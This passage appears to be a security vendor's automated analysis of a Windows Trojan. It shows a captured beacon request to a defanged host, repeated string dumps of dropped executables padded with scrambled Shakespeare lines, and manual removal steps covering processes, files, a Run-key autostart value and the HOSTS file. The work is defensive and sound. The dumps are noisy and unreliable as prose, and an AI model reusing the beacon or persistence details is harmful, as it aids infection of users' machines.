Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /index.php?method=validate&mode=sox&v=029&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: davedekilai.com

HTTP/1.1 302 Found

Date: Sat, 10 May 2014 19:11:38 GMT

Server: Apache

Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=029&sox=3c2d4800

Content-Length: 375

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekil
ai.com?method=validate&mode=sox&v=029&sox=3c2d4800">her
e</a>.</p>.<hr>.<address>Apache Server at dave
dekilai.com Port 80</address>.</body></html>...

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

UUj%U

%xI5 

SSShp

t\SSSh

t!SSSh@

\$lSSShp

t{SSSh

|(SSSh

tWSSSh

D$h-.xG 

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

AWS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

KERNEL32.dll

USER32.dll

GetCPInfo

GetConsoleOutputCP

GetProcessHeap

mifnhxlktoj.exe

xb.exe

Office Net.Tcp DNS Input Card

[email protected]

nxjupqomtrc.exe

F.zza

~C%c?|

j[.ym\

.sO5W

TCP7/

Fr9.GLpS

2_%C.X&

h>.OVA

Ii.wZ

#;e.wo

zcÁ

%Documents and Settings%\LocalService

%WinDir%\TEMP\r3uo4fe6swuxb.exe

mscoree.dll

KERNEL32.DLL

mifnhxlktoj.exe_4552:

.text

`.rdata

@.data

PSSSSSSh

j.PVf

urLwj

~2SSSh

SSSh@CC

t.SSSh

tXSSSh

t#SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

kind and natural; with him, the portion and sinew of

[Exeunt severally]

mifnhxlktoj.exe

km0c.exe

Office Net.Tcp DNS Input Card

nxjupqomtrc.exe

He makes important: possess'd he is with greatness,

here at the door and importunes

He bears him like a portly gentleman;

Shake in and out the rivet: and at this sport

Join with the spite of fortune, make me bow,

limb or joint, shall pass Pompey the Great; the

Rising and cawing at the gun's report,

Flowing and swelling o'er with arts and exercise:

Of hurlyburly innovation:

If once they join in trial. Tell your nephew,

The Prince of Wales doth join with all the world

Is now eclipsed; and it portends alone

10. Certain Ladies or Countesses, with plain

[They pass over the stage in order and state]

7o^.IhK<

2 A%s

He is as disproportion'd in his manners

[Exeunt CALIBAN, STEPHANO, and TRINCULO]

_K<].hC

)W%sT

vI!.ec

MSg/y

q/%SePH_E{

It is no act of common passage, but

should not be conjoined, charge you, on your souls,

Nor wit nor reason can my passion hide.

[Exeunt]

w'.Ff

y.bC{Y

As time and our concernings shall importune,

To the hopeful execution do I leave you

6n %u

Passion on passion deeply is redoubled:

[Enter TITANIA and BOTTOM; PEASEBLOSSOM, COBWEB, MOTH,

Scratch my head Peaseblossom. Where's Mounsieur Cobweb?

COBWEB

Mounsieur Cobweb, good mounsieur, get you your

In such-like circumstance, with suchlike sport:

[Exeunt ROSENCRANTZ and GUILDENSTERN]

Our sovereign process; which imports at full,

Report be an honest woman of her word.

bell-wether; next, to be compassed, like a good

And with our sprightly port make the ghosts gaze:

That the proportion both of thanks and payment

but in passion, not in words only, but in

A goodly portly man, i' faith, and a corpulent; of a

Warble, child; make passionate my sense of hearing.

Sweet air! Go, tenderness of years; take this key,

The very doors and windows savour vilely.

once to all the points o' the compass.

Or if that surly spirit, melancholy,

A passion hateful to my purposes,

[Exeunt all but MENAS and ENOBARBUS]

As great to me as late; and, supportable

Been justled from your senses, know for certain

While I, their king, that hither them importune,

Madam, 'twas Ariadne passioning

This part of his conjoins with my disease,

Their sons with arts and martial exercises:

[Exeunt WARWICK and the rest]

And to our sport.

That my poor beauty had purloin'd his eyes;

Madam, this letter, and some certain jewels,

eRzuýA

PORTIA

But, soft! here come my executioners.

But, sirs, be sudden in the execution,

Concerning this, sir,--O well-painted passion!--

You are welcome, sir, to Cyprus.--Goats and monkeys!

Whom passion could

To try your taking a false report; which hath

[Trumpet sounds. Enter certain Citizens upon the walls]

firago. I had a pass with him, rapier, scabbard and

the supportance of his vow; he protests he will not hurt you.

[Exeunt Host, SHALLOW, and PAGE]

And beat our watch, and rob our passengers;

Takes on the point of honour to support

Come, sir, your passado.

[Exeunt MERCUTIO and BENVOLIO]

Of a certain knight that swore by his honour they

Thou liest, thou jesting monkey, thou: I would my

That's most certain.

How now shall this be compassed?

[Exeunt COMINIUS and MENENIUS]

[Exeunt Citizens]

`, certain vails. I

[Exeunt Attendants with THYREUS]

When grief, and blood ill-temper'd, vexeth him?

[Exeunt ROSALIND and CELIA]

What passion hangs these weights upon my tongue?

From henceforth I will, coz, and devise sports. Let

Marry, I prithee, do, to make sport withal: but

There vanish'd in the sunbeams: which portends--

At every joint and motive of her body.

Nor any unproportioned thought his act.

By computation and mine host's report.

dreamest not of, the which for sport sake are

credit sake, make all whole. I am joined with no

[Enter CASSIO, and certain Officers with torches]

[Enter, several of both houses, who join the fray;

[Exeunt all but HORTENSIO]

What's thy passion!

Thou thinkest I am in sport: I pray thee tell me

rare carpenter? Come, in what key shall a man take

[Exeunt Guard]

cutting the web. After this, the vengeance on the

'For, lo, his passion, but an art of craft,

It did move him to passion, and therefore let's hear it.

[Exeunt COSTARD and JAQUENETTA]

[Exeunt all but Malcolm and Donalbain.

[Exeunt all but KING HENRY]

[Exeunt soldiers]

Your looks are pale and wild, and do import

The just proportion that we gave them out

[Exeunt all but BUCKINGHAM and GLOUCESTER]

And pass my daughter a sufficient dower,

[Exeunt Salarino and Salanio]

Cry you mercy, I took you for a joint-stool.

All made of passion and all made of wishes,

Than a joint burden laid upon us all.

Have there injointed them with an after fleet.

'Tis certain, then, for Cyprus.

If you will then see the fruits of the sport, mark

sing, certainly.

wept; for I must speak in passion, and I will do it

O Jesu, this is excellent sport, i' faith!

This beauteous lady Thisby is certain.

Why, then, it seems, some certain snatch or so

For shame, be friends, and join for that you jar:

carries his house on his head; a better jointure,

Then it is thus: the passions of the mind,

Some certain of the noblest-minded Romans

t you to buy them, along as you pass'd:

Who would not wish to be from wealth exempt,

[Flourish. Exeunt]

[Exeunt BARDOLPH and Page]

But if you fondly pass our proffer'd offer,

%UO"@

We'll pass the business privately and well.

[Exeunt TRANIO, Pedant, and BAPTISTA]

Nothing but his report.

The slave's report is seconded; and more,

Join'd with Aufidius, leads a power 'gainst Rome,

[Exeunt PRINCE HENRY and POINS]

inward between us, let it pass. I do beseech thee,

head: and among other important and most serious

designs, and of great import indeed, too, but let

that pass: for I must tell thee, it will please his

heart, let that pass. By the world, I recount no

fable: some certain special honours it pleaseth his

travel, that hath seen the world; but let that pass.

That drums him from his sport, and speaks as loud

Most noble Caesar, shalt thou have report

zcÁ

%System%\nxjupqomtrc.exe

|tablefruit.net

WATCHDOGPROC "c:\windows\system32\mifnhxlktoj.exe"

%System%\mifnhxlktoj.exe

mscoree.dll

KERNEL32.DLL

nxjupqomtrc.exe_5736:

.text

`.rdata

@.data

PSSSSSSh

j.PVf

urLwj

~2SSSh

SSSh@CC

t.SSSh

tXSSSh

t#SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

kind and natural; with him, the portion and sinew of

[Exeunt severally]

mifnhxlktoj.exe

km0c.exe

Office Net.Tcp DNS Input Card

nxjupqomtrc.exe

He makes important: possess'd he is with greatness,

here at the door and importunes

He bears him like a portly gentleman;

Shake in and out the rivet: and at this sport

Join with the spite of fortune, make me bow,

limb or joint, shall pass Pompey the Great; the

Rising and cawing at the gun's report,

Flowing and swelling o'er with arts and exercise:

Of hurlyburly innovation:

If once they join in trial. Tell your nephew,

The Prince of Wales doth join with all the world

Is now eclipsed; and it portends alone

10. Certain Ladies or Countesses, with plain

[They pass over the stage in order and state]

7o^.IhK<

2 A%s

He is as disproportion'd in his manners

[Exeunt CALIBAN, STEPHANO, and TRINCULO]

_K<].hC

)W%sT

vI!.ec

MSg/y

q/%SePH_E{

It is no act of common passage, but

should not be conjoined, charge you, on your souls,

Nor wit nor reason can my passion hide.

[Exeunt]

w'.Ff

y.bC{Y

As time and our concernings shall importune,

To the hopeful execution do I leave you

6n %u

Passion on passion deeply is redoubled:

[Enter TITANIA and BOTTOM; PEASEBLOSSOM, COBWEB, MOTH,

Scratch my head Peaseblossom. Where's Mounsieur Cobweb?

COBWEB

Mounsieur Cobweb, good mounsieur, get you your

In such-like circumstance, with suchlike sport:

[Exeunt ROSENCRANTZ and GUILDENSTERN]

Our sovereign process; which imports at full,

Report be an honest woman of her word.

bell-wether; next, to be compassed, like a good

And with our sprightly port make the ghosts gaze:

That the proportion both of thanks and payment

but in passion, not in words only, but in

A goodly portly man, i' faith, and a corpulent; of a

Warble, child; make passionate my sense of hearing.

Sweet air! Go, tenderness of years; take this key,

The very doors and windows savour vilely.

once to all the points o' the compass.

Or if that surly spirit, melancholy,

A passion hateful to my purposes,

[Exeunt all but MENAS and ENOBARBUS]

As great to me as late; and, supportable

Been justled from your senses, know for certain

While I, their king, that hither them importune,

Madam, 'twas Ariadne passioning

This part of his conjoins with my disease,

Their sons with arts and martial exercises:

[Exeunt WARWICK and the rest]

And to our sport.

That my poor beauty had purloin'd his eyes;

Madam, this letter, and some certain jewels,

eRzuýA

PORTIA

But, soft! here come my executioners.

But, sirs, be sudden in the execution,

Concerning this, sir,--O well-painted passion!--

You are welcome, sir, to Cyprus.--Goats and monkeys!

Whom passion could

To try your taking a false report; which hath

[Trumpet sounds. Enter certain Citizens upon the walls]

firago. I had a pass with him, rapier, scabbard and

the supportance of his vow; he protests he will not hurt you.

[Exeunt Host, SHALLOW, and PAGE]

And beat our watch, and rob our passengers;

Takes on the point of honour to support

Come, sir, your passado.

[Exeunt MERCUTIO and BENVOLIO]

Of a certain knight that swore by his honour they

Thou liest, thou jesting monkey, thou: I would my

That's most certain.

How now shall this be compassed?

[Exeunt COMINIUS and MENENIUS]

[Exeunt Citizens]

`, certain vails. I

[Exeunt Attendants with THYREUS]

When grief, and blood ill-temper'd, vexeth him?

[Exeunt ROSALIND and CELIA]

What passion hangs these weights upon my tongue?

From henceforth I will, coz, and devise sports. Let

Marry, I prithee, do, to make sport withal: but

There vanish'd in the sunbeams: which portends--

At every joint and motive of her body.

Nor any unproportioned thought his act.

By computation and mine host's report.

dreamest not of, the which for sport sake are

credit sake, make all whole. I am joined with no

[Enter CASSIO, and certain Officers with torches]

[Enter, several of both houses, who join the fray;

[Exeunt all but HORTENSIO]

What's thy passion!

Thou thinkest I am in sport: I pray thee tell me

rare carpenter? Come, in what key shall a man take

[Exeunt Guard]

cutting the web. After this, the vengeance on the

'For, lo, his passion, but an art of craft,

It did move him to passion, and therefore let's hear it.

[Exeunt COSTARD and JAQUENETTA]

[Exeunt all but Malcolm and Donalbain.

[Exeunt all but KING HENRY]

[Exeunt soldiers]

Your looks are pale and wild, and do import

The just proportion that we gave them out

[Exeunt all but BUCKINGHAM and GLOUCESTER]

And pass my daughter a sufficient dower,

[Exeunt Salarino and Salanio]

Cry you mercy, I took you for a joint-stool.

All made of passion and all made of wishes,

Than a joint burden laid upon us all.

Have there injointed them with an after fleet.

'Tis certain, then, for Cyprus.

If you will then see the fruits of the sport, mark

sing, certainly.

wept; for I must speak in passion, and I will do it

O Jesu, this is excellent sport, i' faith!

This beauteous lady Thisby is certain.

Why, then, it seems, some certain snatch or so

For shame, be friends, and join for that you jar:

carries his house on his head; a better jointure,

Then it is thus: the passions of the mind,

Some certain of the noblest-minded Romans

t you to buy them, along as you pass'd:

Who would not wish to be from wealth exempt,

[Flourish. Exeunt]

[Exeunt BARDOLPH and Page]

But if you fondly pass our proffer'd offer,

%UO"@

We'll pass the business privately and well.

[Exeunt TRANIO, Pedant, and BAPTISTA]

Nothing but his report.

The slave's report is seconded; and more,

Join'd with Aufidius, leads a power 'gainst Rome,

[Exeunt PRINCE HENRY and POINS]

inward between us, let it pass. I do beseech thee,

head: and among other important and most serious

designs, and of great import indeed, too, but let

that pass: for I must tell thee, it will please his

heart, let that pass. By the world, I recount no

fable: some certain special honours it pleaseth his

travel, that hath seen the world; but let that pass.

That drums him from his sport, and speaks as loud

Most noble Caesar, shalt thou have report

zcÁ

%System%\nxjupqomtrc.exe

mscoree.dll

KERNEL32.DLL

gaumoefy7ic7km0c.exe_3704:

.text

`.rdata

@.data

PSSSSSSh

j.PVf

urLwj

~2SSSh

SSSh@CC

t.SSSh

tXSSSh

t#SSSh

vSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

WS2_32.dll

OLEAUT32.dll

cmd.exe

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

portuguese-brazilian

operator

GetProcessWindowStation

USER32.DLL

GDI32.dll

GetProcessHeap

KERNEL32.dll

GetKeyboardType

USER32.dll

GetCPInfo

GetConsoleOutputCP

kind and natural; with him, the portion and sinew of

[Exeunt severally]

mifnhxlktoj.exe

km0c.exe

Office Net.Tcp DNS Input Card

nxjupqomtrc.exe

He makes important: possess'd he is with greatness,

here at the door and importunes

He bears him like a portly gentleman;

Shake in and out the rivet: and at this sport

Join with the spite of fortune, make me bow,

limb or joint, shall pass Pompey the Great; the

Rising and cawing at the gun's report,

Flowing and swelling o'er with arts and exercise:

Of hurlyburly innovation:

If once they join in trial. Tell your nephew,

The Prince of Wales doth join with all the world

Is now eclipsed; and it portends alone

10. Certain Ladies or Countesses, with plain

[They pass over the stage in order and state]

7o^.IhK<

2 A%s

He is as disproportion'd in his manners

[Exeunt CALIBAN, STEPHANO, and TRINCULO]

_K<].hC

)W%sT

vI!.ec

MSg/y

q/%SePH_E{

It is no act of common passage, but

should not be conjoined, charge you, on your souls,

Nor wit nor reason can my passion hide.

[Exeunt]

w'.Ff

y.bC{Y

As time and our concernings shall importune,

To the hopeful execution do I leave you

6n %u

Passion on passion deeply is redoubled:

[Enter TITANIA and BOTTOM; PEASEBLOSSOM, COBWEB, MOTH,

Scratch my head Peaseblossom. Where's Mounsieur Cobweb?

COBWEB

Mounsieur Cobweb, good mounsieur, get you your

In such-like circumstance, with suchlike sport:

[Exeunt ROSENCRANTZ and GUILDENSTERN]

Our sovereign process; which imports at full,

Report be an honest woman of her word.

bell-wether; next, to be compassed, like a good

And with our sprightly port make the ghosts gaze:

That the proportion both of thanks and payment

but in passion, not in words only, but in

A goodly portly man, i' faith, and a corpulent; of a

Warble, child; make passionate my sense of hearing.

Sweet air! Go, tenderness of years; take this key,

The very doors and windows savour vilely.

once to all the points o' the compass.

Or if that surly spirit, melancholy,

A passion hateful to my purposes,

[Exeunt all but MENAS and ENOBARBUS]

As great to me as late; and, supportable

Been justled from your senses, know for certain

While I, their king, that hither them importune,

Madam, 'twas Ariadne passioning

This part of his conjoins with my disease,

Their sons with arts and martial exercises:

[Exeunt WARWICK and the rest]

And to our sport.

That my poor beauty had purloin'd his eyes;

Madam, this letter, and some certain jewels,

eRzuýA

PORTIA

But, soft! here come my executioners.

But, sirs, be sudden in the execution,

Concerning this, sir,--O well-painted passion!--

You are welcome, sir, to Cyprus.--Goats and monkeys!

Whom passion could

To try your taking a false report; which hath

[Trumpet sounds. Enter certain Citizens upon the walls]

firago. I had a pass with him, rapier, scabbard and

the supportance of his vow; he protests he will not hurt you.

[Exeunt Host, SHALLOW, and PAGE]

And beat our watch, and rob our passengers;

Takes on the point of honour to support

Come, sir, your passado.

[Exeunt MERCUTIO and BENVOLIO]

Of a certain knight that swore by his honour they

Thou liest, thou jesting monkey, thou: I would my

That's most certain.

How now shall this be compassed?

[Exeunt COMINIUS and MENENIUS]

[Exeunt Citizens]

`, certain vails. I

[Exeunt Attendants with THYREUS]

When grief, and blood ill-temper'd, vexeth him?

[Exeunt ROSALIND and CELIA]

What passion hangs these weights upon my tongue?

From henceforth I will, coz, and devise sports. Let

Marry, I prithee, do, to make sport withal: but

There vanish'd in the sunbeams: which portends--

At every joint and motive of her body.

Nor any unproportioned thought his act.

By computation and mine host's report.

dreamest not of, the which for sport sake are

credit sake, make all whole. I am joined with no

[Enter CASSIO, and certain Officers with torches]

[Enter, several of both houses, who join the fray;

[Exeunt all but HORTENSIO]

What's thy passion!

Thou thinkest I am in sport: I pray thee tell me

rare carpenter? Come, in what key shall a man take

[Exeunt Guard]

cutting the web. After this, the vengeance on the

'For, lo, his passion, but an art of craft,

It did move him to passion, and therefore let's hear it.

[Exeunt COSTARD and JAQUENETTA]

[Exeunt all but Malcolm and Donalbain.

[Exeunt all but KING HENRY]

[Exeunt soldiers]

Your looks are pale and wild, and do import

The just proportion that we gave them out

[Exeunt all but BUCKINGHAM and GLOUCESTER]

And pass my daughter a sufficient dower,

[Exeunt Salarino and Salanio]

Cry you mercy, I took you for a joint-stool.

All made of passion and all made of wishes,

Than a joint burden laid upon us all.

Have there injointed them with an after fleet.

'Tis certain, then, for Cyprus.

If you will then see the fruits of the sport, mark

sing, certainly.

wept; for I must speak in passion, and I will do it

O Jesu, this is excellent sport, i' faith!

This beauteous lady Thisby is certain.

Why, then, it seems, some certain snatch or so

For shame, be friends, and join for that you jar:

carries his house on his head; a better jointure,

Then it is thus: the passions of the mind,

Some certain of the noblest-minded Romans

t you to buy them, along as you pass'd:

Who would not wish to be from wealth exempt,

[Flourish. Exeunt]

[Exeunt BARDOLPH and Page]

But if you fondly pass our proffer'd offer,

%UO"@

We'll pass the business privately and well.

[Exeunt TRANIO, Pedant, and BAPTISTA]

Nothing but his report.

The slave's report is seconded; and more,

Join'd with Aufidius, leads a power 'gainst Rome,

[Exeunt PRINCE HENRY and POINS]

inward between us, let it pass. I do beseech thee,

head: and among other important and most serious

designs, and of great import indeed, too, but let

that pass: for I must tell thee, it will please his

heart, let that pass. By the world, I recount no

fable: some certain special honours it pleaseth his

travel, that hath seen the world; but let that pass.

That drums him from his sport, and speaks as loud

Most noble Caesar, shalt thou have report

zcÁ

%WinDir%\TEMP\gaumoefy7ic7km0c.exe

mscoree.dll

KERNEL32.DLL

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   r3uo4fe6swuxb.exe:3140
   gaumoefy7ic7km0c.exe:3704
   gaumoefy7v7bkm0c.exe:3952
   r3uo4fe6k0jxbf9xzwtt.exe:2740
   %original file name%.exe:1072
   wuauclt.exe:1876
   mifnhxlktoj.exe:3920
   mifnhxlktoj.exe:4552
   mifnhxlktoj.exe:884
   nxjupqomtrc.exe:5736
   nxjupqomtrc.exe:5104
   r3uo4fe75uzxb.exe:4436
   r3uo4fe6x4rxb.exe:2304
   gaumoefy7al4km0c.exe:3436
   r3uo4fe6l5rxb.exe:2852

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %System%\ajbgsktanfne\tst (10 bytes)
   %System%\mifnhxlktoj.exe (5873 bytes)
   %System%\ajbgsktanfne\etc (10 bytes)
   %System%\drivers\etc\hosts (22 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\r3uo4fe6k0jxbf9xzwtt.exe (3877 bytes)
   %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
   %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
   %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
   %System%\ajbgsktanfne\rng (48 bytes)
   %WinDir%\Temp\r3uo4fe75uzxb.exe (35 bytes)
   %System%\ajbgsktanfne\run (10 bytes)
   %WinDir%\Temp\r3uo4fe6l5rxb.exe (35 bytes)
   %WinDir%\Temp\r3uo4fe6x4rxb.exe (26431 bytes)
   %System%\nxjupqomtrc.exe (5873 bytes)
   %System%\ajbgsktanfne\cfg (110 bytes)
   %WinDir%\Temp\r3uo4fe6swuxb.exe (5873 bytes)
   %WinDir%\Temp\gaumoefy7ic7km0c.exe (7547 bytes)
   %WinDir%\Temp\gaumoefy7al4km0c.exe (35 bytes)
   %System%\ajbgsktanfne\ihst (224 bytes)
   %WinDir%\Temp\gaumoefy7v7bkm0c.exe (35 bytes)
   %System%\ajbgsktanfne\por (1 bytes)
   

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "Office Net.Tcp DNS Input Card" = "%System%\mifnhxlktoj.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.